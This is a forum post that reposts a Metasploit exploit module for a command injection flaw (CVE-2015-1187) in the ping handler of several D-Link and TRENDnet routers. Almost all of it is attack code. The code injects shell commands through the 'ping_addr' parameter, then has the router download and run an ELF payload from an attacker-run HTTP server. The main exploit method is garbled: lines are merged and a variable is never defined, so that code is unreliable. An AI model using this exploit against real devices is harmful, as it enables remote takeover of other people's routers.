Jump to content
KhiZaRix

D-Link/TRENDnet NCC Service Command Injection

By KhiZaRix, in Exploituri

Recommended Posts

KhiZaRix Newbie

KhiZaRix

Posted
Posted 


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking # Only tested on Emulated environment

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'D-Link/TRENDnet NCC Service Command Injection',
      'Description'    => %q{
        This module exploits a remote command injection vulnerability on several routers. The
        vulnerability exists in the ncc service, while handling ping commands. This module has
        been tested on a DIR-626L emulated environment only. Several D-Link and TRENDnet devices
        are reported as affected, including: D-Link DIR-626L (Rev A) v1.04b04, D-Link DIR-636L
        (Rev A) v1.04, D-Link DIR-808L (Rev A) v1.03b05, D-Link DIR-810L (Rev A) v1.01b04, D-Link
        DIR-810L (Rev  v2.02b01, D-Link DIR-820L (Rev A) v1.02B10, D-Link DIR-820L (Rev A)
        v1.05B03, D-Link DIR-820L (Rev  v2.01b02, D-Link DIR-826L (Rev A) v1.00b23, D-Link
        DIR-830L (Rev A) v1.00b07, D-Link DIR-836L (Rev A) v1.01b03 and TRENDnet TEW-731BR (Rev 2)
        v2.01b01
      },
      'Author'         =>
        [
          'Peter Adkins <peter.adkins[at]kernelpicnic.net>', # Vulnerability discovery and initial PoC
          'Tiago Caetano Henriques', # Vulnerability discovery and initial PoC
          'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2015-1187'],
          ['BID', '72816'],
          ['URL', 'https://github.com/darkarnium/secpub/tree/master/Multivendor/ncc2'],
          ['URL', 'http://seclists.org/fulldisclosure/2015/Mar/15'],
          ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10052']
        ],
      'Targets'        =>
        # Only tested on D-Link DIR-626L where wget is available
        [
          [ 'Linux mipsel Payload',
            {
            'Arch' => ARCH_MIPSLE,
            'Platform' => 'linux'
            }
          ],
          [ 'Linux mipsbe Payload',
            {
            'Arch' => ARCH_MIPSBE,
            'Platform' => 'linux'
            }
          ],
        ],
      'DisclosureDate'  => 'Feb 26 2015',
      'DefaultTarget'   => 0))

    register_options(
      [
        OptString.new('WRITABLEDIR', [ true, 'A directory where we can write files', '/tmp' ]),
        OptString.new('EXTURL', [ false, 'An alternative host to request the EXE payload from' ]),
        OptString.new('TARGETURI', [true, 'The base path to the vulnerable application area', '/ping.ccp']),
        OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 10])
      ], self.class)
  end

  def check
    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri'    => normalize_uri(target_uri.path)
      })

      # unknown if other devices also using mini_httpd
      if res && [500].include?(res.code) && res.headers['Server'] && res.headers['Server'] =~ /mini_httpd/
        return Exploit::CheckCode::Detected
      end
    rescue ::Rex::ConnectionError
      return Exploit::CheckCode::Unknown
    end

    Exploit::CheckCode::Unknown
  end

  def exec_command(cmd, timeout = 20)
    begin
      res = send_request_cgi({
        'method' => 'POST',
        'uri'    => normalize_uri(target_uri.path),
        'encode_params' => false,
        'vars_post' => {
          'ccp_act' => 'ping_v6',
          'ping_addr' => '$(' + cmd + ')'
        }
      }, timeout)
      return res
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end

  def primer
    @payload_url = get_uri
    wget_payload
  end

  def exploit
    print_status("#{peer} - Accessing the vulnerable URL...")

    unless check == Exploit::CheckCode::Detected
      fail_with(Failure::NoTarget, "#{peer} - Failed to access the vulnerable URL")
    end

    print_status("#{peer} - Exploiting...")

    @pl = generate_payload_exe
    @payload_url  = ''
    @dropped_elf)

    print_status("#{peer} - Executing the payload...")
    res = exec_command(cmd, 1)

    unless res
      fail_with(Failure::Unknown, "#{peer} - Unable to exec payload")
    end

    Rex.sleep(1)
  end

  # Handle incoming requests to the HTTP server
  def on_request_uri(cli, request)
    print_status("Request: #{request.uri}")
    if request.uri =~ /#{Regexp.escape(get_resource)}/
      print_status('Sending payload...')
      send_response(cli, @pl)
    end
  end
end

Source: http://packetstorm.wowhacker.com/1504-exploits/multi_ncc_ping_exec.rb.txt

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...